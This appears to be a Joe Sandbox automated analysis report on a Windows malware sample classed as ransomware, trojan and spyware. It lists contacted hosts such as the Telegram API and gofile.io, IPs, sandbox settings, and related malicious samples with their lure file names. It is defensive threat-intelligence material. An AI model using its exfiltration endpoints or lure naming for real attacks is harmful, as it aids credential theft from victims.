                                                                                                                                                                                                    http://ip-score.com/checkip/LMEMLKxcbzlwkz.exe, 00000000.00000002.3000653293.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp, LKxcbzlwkz.exe, 00000000.00000003.2062832927.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp, LKxcbzlwkz.exe, 00000000.00000003.2063068490.0000000000BF0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      https://support.mozilla.orgtmp42BD.tmp.dat.1.drfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplestmpF011.tmp.dat.1.dr, tmpF031.tmp.dat.1.drfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          http://api.telegram.orgJOUNLV.exe, 00000001.00000002.2015535093.000001BB381AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=tmpEFE0.tmp.dat.1.dr, tmp555.tmp.dat.1.drfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              https://gofile.io/d/liMaKCJOUNLV.exe, 00000001.00000002.2015535093.000001BB37FA4000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2015535093.000001BB37E73000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2015535093.000001BB37ECD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                http://ip-score.com/LKxcbzlwkz.exe, 00000000.00000002.3000653293.0000000000BF0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		high

                                                                                                                                                                                                                  World Map of Contacted IPs

                                                                                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                                                                                  • 75% < No. of IPs

                                                                                                                                                                                                                  Public IPs

                                                                                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                  149.154.167.220
                                                                                                                                                                                                                  		api.telegram.orgUnited Kingdom
                                                                                                                                                                                                                  		62041TELEGRAMRUfalse
                                                                                                                                                                                                                  104.16.184.241
                                                                                                                                                                                                                  		icanhazip.comUnited States
                                                                                                                                                                                                                  		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                  45.112.123.126
                                                                                                                                                                                                                  		api.gofile.ioSingapore
                                                                                                                                                                                                                  		16509AMAZON-02USfalse
                                                                                                                                                                                                                  50.17.0.11
                                                                                                                                                                                                                  		szurubooru.zulipchat.comUnited States
                                                                                                                                                                                                                  		14618AMAZON-AESUStrue
                                                                                                                                                                                                                  31.14.70.249
                                                                                                                                                                                                                  		store6.gofile.ioVirgin Islands (BRITISH)
                                                                                                                                                                                                                  		199483LINKER-ASFRfalse
                                                                                                                                                                                                                  185.199.110.133
                                                                                                                                                                                                                  		raw.githubusercontent.comNetherlands
                                                                                                                                                                                                                  		54113FASTLYUSfalse
                                                                                                                                                                                                                  188.138.68.212
                                                                                                                                                                                                                  		ip-score.comGermany
                                                                                                                                                                                                                  		8972GD-EMEA-DC-SXB1DEfalse

                                                                                                                                                                                                                  Private

                                                                                                                                                                                                                  IP
                                                                                                                                                                                                                  192.168.0.82

                                                                                                                                                                                                                  General Information

                                                                                                                                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                  Analysis ID:1565141
                                                                                                                                                                                                                  Start date and time:2024-11-29 10:56:06 +01:00
                                                                                                                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                  Overall analysis duration:0h 7m 31s
                                                                                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                  Report type:full
                                                                                                                                                                                                                  Cookbook file name:default.jbs
                                                                                                                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                  Number of analysed new started processes analysed:24
                                                                                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                                                                                  Technologies:
                                                                                                                                                                                                                  • HCA enabled
                                                                                                                                                                                                                  • EGA enabled
                                                                                                                                                                                                                  • AMSI enabled
                                                                                                                                                                                                                  Analysis Mode:default
                                                                                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                                                                                  Sample name:LKxcbzlwkz.exe
                                                                                                                                                                                                                  renamed because original name is a hash value
                                                                                                                                                                                                                  Original Sample Name:02c5585c0346b9f7632691c41bb5741b8ab7b0f785e707ae65e918633bb5b801.exe
                                                                                                                                                                                                                  Detection:MAL
                                                                                                                                                                                                                  Classification:mal100.rans.troj.spyw.evad.winEXE@35/91@10/8
                                                                                                                                                                                                                  EGA Information:
                                                                                                                                                                                                                  • Successful, ratio: 50%
                                                                                                                                                                                                                  HCA Information:
                                                                                                                                                                                                                  • Successful, ratio: 81%
                                                                                                                                                                                                                  • Number of executed functions: 76
                                                                                                                                                                                                                  • Number of non-executed functions: 283
                                                                                                                                                                                                                  Cookbook Comments:
                                                                                                                                                                                                                  • Found application associated with file extension: .exe

                                                                                                                                                                                                                  Warnings

                                                                                                                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                                                                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                  • Execution Graph export aborted for target JOUNLV.exe, PID 4828 because it is empty
                                                                                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                  • VT rate limit hit for: LKxcbzlwkz.exe

                                                                                                                                                                                                                  Simulations

                                                                                                                                                                                                                  Behavior and APIs

                                                                                                                                                                                                                  TimeTypeDescription
                                                                                                                                                                                                                  04:57:08API Interceptor199x Sleep call for process: JOUNLV.exe modified

                                                                                                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                                                                                                  IPs

                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                  149.154.167.220nYkkZZbAIR.exeGet hashmaliciousStealeriumBrowse
                                                                                                                                                                                                                    MICROCHIP QFP3 22 - 25000.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                      JUSTIFICANTE PAGO FRAS NOVIEMBRE 2024.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                                                        AWB8674109965.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                          INQUIRY_pdf.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                            RECEIPT DATED 28.11.2024,pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                                                              drawing 10023. spec T4 300W .... dimn 560horsepower po 1198624 _ %00% spec .exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                t1gY0BGmOZ.jarGet hashmaliciousCan StealerBrowse
                                                                                                                                                                                                                                  1C24TBP_00000143.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                    QUOTATION_AUGQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                      104.16.184.2419fGsCDYKLV.exeGet hashmaliciousFlesh StealerBrowse
                                                                                                                                                                                                                                      • icanhazip.com/
                                                                                                                                                                                                                                      file.exeGet hashmaliciousFlesh StealerBrowse
                                                                                                                                                                                                                                      • icanhazip.com/
                                                                                                                                                                                                                                      vbe11TPn2x.exeGet hashmaliciousFlesh StealerBrowse
                                                                                                                                                                                                                                      • icanhazip.com/
                                                                                                                                                                                                                                      zufmUwylvo.exeGet hashmaliciousFlesh Stealer, XmrigBrowse
                                                                                                                                                                                                                                      • icanhazip.com/
                                                                                                                                                                                                                                      gGcpYEOr8U.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      • icanhazip.com/
                                                                                                                                                                                                                                      GsZkXAmf61.exeGet hashmaliciousCelestial RatBrowse
                                                                                                                                                                                                                                      • icanhazip.com/
                                                                                                                                                                                                                                      mitec_purchase_order_PDF (1).vbsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                                                                                                                                                                                                      • icanhazip.com/
                                                                                                                                                                                                                                      Purchase Order.jsGet hashmaliciousPXRECVOWEIWOEI Stealer, PureLog StealerBrowse
                                                                                                                                                                                                                                      • icanhazip.com/
                                                                                                                                                                                                                                      DbwdFVTAXI.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                                                                                                                                                                                                      • icanhazip.com/
                                                                                                                                                                                                                                      4b8lIXw22G.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                                                                                                                                                                                                      • icanhazip.com/
                                                                                                                                                                                                                                      45.112.123.126t1gY0BGmOZ.jarGet hashmaliciousCan StealerBrowse
                                                                                                                                                                                                                                        t1gY0BGmOZ.jarGet hashmaliciousCan StealerBrowse
                                                                                                                                                                                                                                          MayitaV16.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            bZPAo2e2Pv.jarGet hashmaliciousCan StealerBrowse
                                                                                                                                                                                                                                              bZPAo2e2Pv.jarGet hashmaliciousCan StealerBrowse
                                                                                                                                                                                                                                                iDvmIRCPBw.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  ZdXUGLQpoL.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    jaPB8q3WL1.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      yx7VCK1nxU.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        RuntimeusererVers.exeGet hashmaliciousPython StealerBrowse

                                                                                                                                                                                                                                                          Domains

                                                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                          ip-score.comSKEGWY.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                          • 188.138.68.212
                                                                                                                                                                                                                                                          raw.githubusercontent.comCCuITQzvd4.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                          • 185.199.108.133
                                                                                                                                                                                                                                                          dMFmJxq6oK.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                          • 185.199.109.133
                                                                                                                                                                                                                                                          nYkkZZbAIR.exeGet hashmaliciousStealeriumBrowse
                                                                                                                                                                                                                                                          • 185.199.110.133
                                                                                                                                                                                                                                                          Job Description.lnk.download.lnkGet hashmaliciousRDPWrap Tool, DucktailBrowse
                                                                                                                                                                                                                                                          • 185.199.110.133
                                                                                                                                                                                                                                                          CORREIO BCV.zip.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                          • 185.199.111.133
                                                                                                                                                                                                                                                          document.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                          • 185.199.111.133
                                                                                                                                                                                                                                                          ZipRipper.cmdGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                          • 185.199.108.133
                                                                                                                                                                                                                                                          gr5zS9wytq.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                          • 185.199.111.133
                                                                                                                                                                                                                                                          gr5zS9wytq.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                          • 185.199.110.133
                                                                                                                                                                                                                                                          based.exeGet hashmaliciousDCRat, PureLog Stealer, Xmrig, zgRATBrowse
                                                                                                                                                                                                                                                          • 185.199.110.133
                                                                                                                                                                                                                                                          api.telegram.orgnYkkZZbAIR.exeGet hashmaliciousStealeriumBrowse
                                                                                                                                                                                                                                                          • 149.154.167.220
                                                                                                                                                                                                                                                          MICROCHIP QFP3 22 - 25000.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                                          • 149.154.167.220
                                                                                                                                                                                                                                                          JUSTIFICANTE PAGO FRAS NOVIEMBRE 2024.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                                                                                          • 149.154.167.220
                                                                                                                                                                                                                                                          AWB8674109965.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                          • 149.154.167.220
                                                                                                                                                                                                                                                          INQUIRY_pdf.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                                          • 149.154.167.220
                                                                                                                                                                                                                                                          RECEIPT DATED 28.11.2024,pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                                                                                          • 149.154.167.220
                                                                                                                                                                                                                                                          drawing 10023. spec T4 300W .... dimn 560horsepower po 1198624 _ %00% spec .exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                                          • 149.154.167.220
                                                                                                                                                                                                                                                          t1gY0BGmOZ.jarGet hashmaliciousCan StealerBrowse
                                                                                                                                                                                                                                                          • 149.154.167.220
                                                                                                                                                                                                                                                          1C24TBP_00000143.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                                          • 149.154.167.220
                                                                                                                                                                                                                                                          QUOTATION_AUGQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                                          • 149.154.167.220
                                                                                                                                                                                                                                                          store6.gofile.ioSecuriteInfo.com.Trojan.DownLoader45.55850.18837.22068.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                          • 136.175.8.205
                                                                                                                                                                                                                                                          Clylm.exeGet hashmaliciousClipboard HijackerBrowse
                                                                                                                                                                                                                                                          • 136.175.8.205
                                                                                                                                                                                                                                                          C4PROloader.exeGet hashmaliciousClipboard HijackerBrowse
                                                                                                                                                                                                                                                          • 136.175.8.205
                                                                                                                                                                                                                                                          SecuriteInfo.com.Trojan.DownLoader45.55850.31523.3941.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                          • 136.175.8.205
                                                                                                                                                                                                                                                          build.exeGet hashmaliciousClipboard Hijacker, StealeriumBrowse
                                                                                                                                                                                                                                                          • 31.14.70.246
                                                                                                                                                                                                                                                          SecuriteInfo.com.Win64.Evo-gen.1195.20229.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                          • 31.14.70.246
                                                                                                                                                                                                                                                          4b7af02af4ab2601c9006b3734bce41adf72f4f212765.exeGet hashmaliciousAmadey, RedLine, SmokeLoaderBrowse
                                                                                                                                                                                                                                                          • 31.14.70.246
                                                                                                                                                                                                                                                          g0Cm482vVa.exeGet hashmaliciousStealeriumBrowse
                                                                                                                                                                                                                                                          • 31.14.70.246
                                                                                                                                                                                                                                                          Roblox Hack.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                                                                                          • 31.14.70.246
                                                                                                                                                                                                                                                          Synapse X.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                                                                                          • 31.14.70.246

                                                                                                                                                                                                                                                          ASNs

                                                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                          TELEGRAMRUnYkkZZbAIR.exeGet hashmaliciousStealeriumBrowse
                                                                                                                                                                                                                                                          • 149.154.167.220
                                                                                                                                                                                                                                                          MICROCHIP QFP3 22 - 25000.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                                          • 149.154.167.220
                                                                                                                                                                                                                                                          JUSTIFICANTE PAGO FRAS NOVIEMBRE 2024.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                                                                                          • 149.154.167.220
                                                                                                                                                                                                                                                          file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Nymaim, Stealc, VidarBrowse
                                                                                                                                                                                                                                                          • 149.154.167.99
                                                                                                                                                                                                                                                          file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                          • 149.154.167.99
                                                                                                                                                                                                                                                          AWB8674109965.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                          • 149.154.167.220
                                                                                                                                                                                                                                                          INQUIRY_pdf.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                                          • 149.154.167.220
                                                                                                                                                                                                                                                          RECEIPT DATED 28.11.2024,pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                                                                                          • 149.154.167.220
                                                                                                                                                                                                                                                          drawing 10023. spec T4 300W .... dimn 560horsepower po 1198624 _ %00% spec .exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                                          • 149.154.167.220
                                                                                                                                                                                                                                                          t1gY0BGmOZ.jarGet hashmaliciousCan StealerBrowse
                                                                                                                                                                                                                                                          • 149.154.167.220
                                                                                                                                                                                                                                                          CLOUDFLARENETUSCCuITQzvd4.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                          • 104.26.1.5
                                                                                                                                                                                                                                                          dMFmJxq6oK.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                          • 104.26.1.5
                                                                                                                                                                                                                                                          qAyJeM1rqk.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                          • 172.67.160.80
                                                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                          • 104.21.16.9
                                                                                                                                                                                                                                                          You have received a gift from Giftano.emlGet hashmaliciousGiftCardfraudBrowse
                                                                                                                                                                                                                                                          • 104.17.25.14
                                                                                                                                                                                                                                                          PAYMENT_ADVICE.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                          • 104.21.24.198
                                                                                                                                                                                                                                                          MICROCHIP QFP3 22 - 25000.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                                          • 104.21.67.152
                                                                                                                                                                                                                                                          JUSTIFICANTE PAGO FRAS NOVIEMBRE 2024.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                                                                                          • 104.21.67.152
                                                                                                                                                                                                                                                          kingsmaker_4.ca.ps1Get hashmaliciousDucktailBrowse
                                                                                                                                                                                                                                                          • 172.67.179.67
                                                                                                                                                                                                                                                          specifications.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                                                                                          • 104.21.90.137
                                                                                                                                                                                                                                                          AMAZON-AESUSfile.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                                                                                                                                                                          • 18.213.123.165
                                                                                                                                                                                                                                                          file.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                                                                                                                                                                          • 18.208.8.205
                                                                                                                                                                                                                                                          file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, Nymaim, StealcBrowse
                                                                                                                                                                                                                                                          • 18.208.8.205
                                                                                                                                                                                                                                                          loligang.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                          • 44.219.138.3
                                                                                                                                                                                                                                                          kingsmaker_4.ca.ps1Get hashmaliciousDucktailBrowse
                                                                                                                                                                                                                                                          • 52.6.155.20
                                                                                                                                                                                                                                                          kingsmaker_6.ca.ps1Get hashmaliciousDucktailBrowse
                                                                                                                                                                                                                                                          • 52.6.155.20
                                                                                                                                                                                                                                                          Job Description.lnk (2).download.lnkGet hashmaliciousDucktailBrowse
                                                                                                                                                                                                                                                          • 50.16.47.176
                                                                                                                                                                                                                                                          Company Booklet.lnk (2).download.lnkGet hashmaliciousDucktailBrowse
                                                                                                                                                                                                                                                          • 3.233.129.217
                                                                                                                                                                                                                                                          Job Description.lnk.download.lnkGet hashmaliciousDucktailBrowse
                                                                                                                                                                                                                                                          • 3.219.243.226
                                                                                                                                                                                                                                                          file.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                                                                                                                                                                          • 18.208.8.205
                                                                                                                                                                                                                                                          AMAZON-02USloligang.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                          • 99.78.142.235
                                                                                                                                                                                                                                                          You have received a gift from Giftano.emlGet hashmaliciousGiftCardfraudBrowse
                                                                                                                                                                                                                                                          • 76.223.125.47
                                                                                                                                                                                                                                                          PAYMENT_ADVICE.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                          • 13.248.169.48
                                                                                                                                                                                                                                                          sora.i686.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                          • 54.171.230.55
                                                                                                                                                                                                                                                          loligang.spc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                          • 18.236.149.213
                                                                                                                                                                                                                                                          loligang.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                          • 100.23.80.86
                                                                                                                                                                                                                                                          loligang.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                          • 44.235.121.154
                                                                                                                                                                                                                                                          loligang.arm5.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                          • 54.217.10.153
                                                                                                                                                                                                                                                          loligang.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                          • 18.219.202.31
                                                                                                                                                                                                                                                          https://www.haysbohelpdesk-dach.net/WorkOrder.do?woMode=newWO&from=Templates&module=incident&reqTemplate=5403Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                          • 44.237.131.128

                                                                                                                                                                                                                                                          JA3 Fingerprints

                                                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                          3b5074b1b5d032e5620f69f9f700ff0enYkkZZbAIR.exeGet hashmaliciousStealeriumBrowse
                                                                                                                                                                                                                                                          • 149.154.167.220
                                                                                                                                                                                                                                                          • 45.112.123.126
                                                                                                                                                                                                                                                          • 50.17.0.11
                                                                                                                                                                                                                                                          • 31.14.70.249
                                                                                                                                                                                                                                                          • 185.199.110.133
                                                                                                                                                                                                                                                          https://theoggroup-my.sharepoint.com/:u:/g/personal/rohit_theoggroup_co/EW1S6u7eBPZAkl8sn76CFW4B9_fhjfgaN299JnYAgaQ9MQ?e=CXhREy&xsdata=MDV8MDJ8RGVib3JhaC5DbGFya0BtcGZ0Lm5ocy51a3w5NDRiZjU4NDRlNTk0NmZlNWNlNTA4ZGQwZmI5NDMxMnxjMzdkNjM1N2M4OGI0MjZiYjY4MGRmODE2NmE4NmVkN3wwfDB8NjM4Njg0MDEwNTcwNTEwNzIwfFVua25vd258VFdGcGJHWnNiM2Q4ZXlKRmJYQjBlVTFoY0draU9uUnlkV1VzSWxZaU9pSXdMakF1TURBd01DSXNJbEFpT2lKWGFXNHpNaUlzSWtGT0lqb2lUV0ZwYkNJc0lsZFVJam95ZlE9PXwwfHx8&sdata=MHA0b3IvdkFFTytKRVJ3WGJUSzFiaW1jbm16a2hNNURVamQwbGRiNFB6RT0%3dGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                          • 149.154.167.220
                                                                                                                                                                                                                                                          • 45.112.123.126
                                                                                                                                                                                                                                                          • 50.17.0.11
                                                                                                                                                                                                                                                          • 31.14.70.249
                                                                                                                                                                                                                                                          • 185.199.110.133
                                                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                          • 149.154.167.220
                                                                                                                                                                                                                                                          • 45.112.123.126
                                                                                                                                                                                                                                                          • 50.17.0.11
                                                                                                                                                                                                                                                          • 31.14.70.249
                                                                                                                                                                                                                                                          • 185.199.110.133
                                                                                                                                                                                                                                                          Payment_Advice_HSBC_Swift_Copy.pdf.lnkGet hashmaliciousRedLineBrowse
                                                                                                                                                                                                                                                          • 149.154.167.220
                                                                                                                                                                                                                                                          • 45.112.123.126
                                                                                                                                                                                                                                                          • 50.17.0.11
                                                                                                                                                                                                                                                          • 31.14.70.249
                                                                                                                                                                                                                                                          • 185.199.110.133
                                                                                                                                                                                                                                                          11309-#U96fb#U4fe1#U8cbb#U96fb#U5b50#U901a#U77e5#U55ae#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                                                                          • 149.154.167.220
                                                                                                                                                                                                                                                          • 45.112.123.126
                                                                                                                                                                                                                                                          • 50.17.0.11
                                                                                                                                                                                                                                                          • 31.14.70.249
                                                                                                                                                                                                                                                          • 185.199.110.133
                                                                                                                                                                                                                                                          INV_642421346_50136253995_SIMPLE_SK#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                                                                          • 149.154.167.220
                                                                                                                                                                                                                                                          • 45.112.123.126
                                                                                                                                                                                                                                                          • 50.17.0.11
                                                                                                                                                                                                                                                          • 31.14.70.249
                                                                                                                                                                                                                                                          • 185.199.110.133
                                                                                                                                                                                                                                                          30180908_signed#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                                                                          • 149.154.167.220
                                                                                                                                                                                                                                                          • 45.112.123.126
                                                                                                                                                                                                                                                          • 50.17.0.11
                                                                                                                                                                                                                                                          • 31.14.70.249
                                                                                                                                                                                                                                                          • 185.199.110.133
                                                                                                                                                                                                                                                          #U017dIADOS#U0164 O ROZPO#U010cET 28.11.2024#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                                                                          • 149.154.167.220
                                                                                                                                                                                                                                                          • 45.112.123.126
                                                                                                                                                                                                                                                          • 50.17.0.11
                                                                                                                                                                                                                                                          • 31.14.70.249
                                                                                                                                                                                                                                                          • 185.199.110.133
                                                                                                                                                                                                                                                          MICROCHIP QFP3 22 - 25000.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                                          • 149.154.167.220
                                                                                                                                                                                                                                                          • 45.112.123.126
                                                                                                                                                                                                                                                          • 50.17.0.11
                                                                                                                                                                                                                                                          • 31.14.70.249
                                                                                                                                                                                                                                                          • 185.199.110.133
                                                                                                                                                                                                                                                          Order Ref SO14074.pdf.scr.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                          • 149.154.167.220
                                                                                                                                                                                                                                                          • 45.112.123.126
                                                                                                                                                                                                                                                          • 50.17.0.11
                                                                                                                                                                                                                                                          • 31.14.70.249
                                                                                                                                                                                                                                                          • 185.199.110.133
                                                                                                                                                                                                                                                          37f463bf4616ecd445d4a1937da06e19CCuITQzvd4.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                          • 188.138.68.212
                                                                                                                                                                                                                                                          dMFmJxq6oK.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                          • 188.138.68.212
                                                                                                                                                                                                                                                          11309-#U96fb#U4fe1#U8cbb#U96fb#U5b50#U901a#U77e5#U55ae#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                                                                          • 188.138.68.212
                                                                                                                                                                                                                                                          INV_642421346_50136253995_SIMPLE_SK#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                                                                          • 188.138.68.212
                                                                                                                                                                                                                                                          30180908_signed#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                                                                          • 188.138.68.212
                                                                                                                                                                                                                                                          #U017dIADOS#U0164 O ROZPO#U010cET 28.11.2024#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                                                                          • 188.138.68.212
                                                                                                                                                                                                                                                          JUSTIFICANTE PAGO FRAS NOVIEMBRE 2024.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                                                                                          • 188.138.68.212
                                                                                                                                                                                                                                                          rjustificantePago_es_5678021862895.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                                                                          • 188.138.68.212
                                                                                                                                                                                                                                                          file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Nymaim, Stealc, VidarBrowse
                                                                                                                                                                                                                                                          • 188.138.68.212
                                                                                                                                                                                                                                                          file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                          • 188.138.68.212

                                                                                                                                                                                                                                                          Dropped Files

                                                                                                                                                                                                                                                          No context

                                                                                                                                                                                                                                                          Created / dropped Files

